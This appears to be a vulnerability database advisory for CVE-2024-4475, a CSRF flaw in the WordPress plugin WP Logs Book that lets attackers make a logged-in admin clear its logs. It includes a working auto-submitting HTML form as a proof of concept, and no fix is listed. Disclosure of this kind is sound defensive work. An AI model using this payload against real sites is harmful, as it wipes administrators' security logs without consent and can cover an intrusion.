WP Logs Book <= 1.0.1 – Log Clearing via CSRF | CVE 2024-4475 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when clearing logs, which could allow attackers to make a logged in admin clear the logs them via a CSRF attack

Proof of Concept

Make an admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://wps-test.ddev.site/wp-admin/admin.php?page=wp-logs-book/login_attack_log" method="POST"> 
        <input name="clear_log" type="text" value="Clear log">
        <input type="submit" value="submit">
    </form>
</body>
```

Note: The 404 Error Logs can also be cleared by modifying the PoC

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

f0c7fa00-da6e-4f07-875f-7b85759a54b3

Timeline

Publicly Published

2024-05-31 (about 30 days ago)

Added

2024-05-31 (about 29 days ago)

Last Updated

2024-05-31 (about 29 days ago)

Other

Published

Title

Published

2024-03-28

Title

Custom WooCommerce Checkout Fields Editor < 1.3.1 - Cross-Site Request Forgery

Published

2023-11-16

Title

Arigato Autoresponder and Newsletter < 2.7.2.3 - CSRF

Published

2022-05-23

Title

One Click Plugin Updater <= 2.4.14 - Arbitrary Settings Update via CSRF

Published

2023-03-16

Title

Event Manager for WooCommerce < 3.7.8 - Cross-Site Request Forgery (CSRF)

Published

2021-07-05

Title

Unlimited Category slider for WooCommerce < 2.1.0 - CSRF Bypass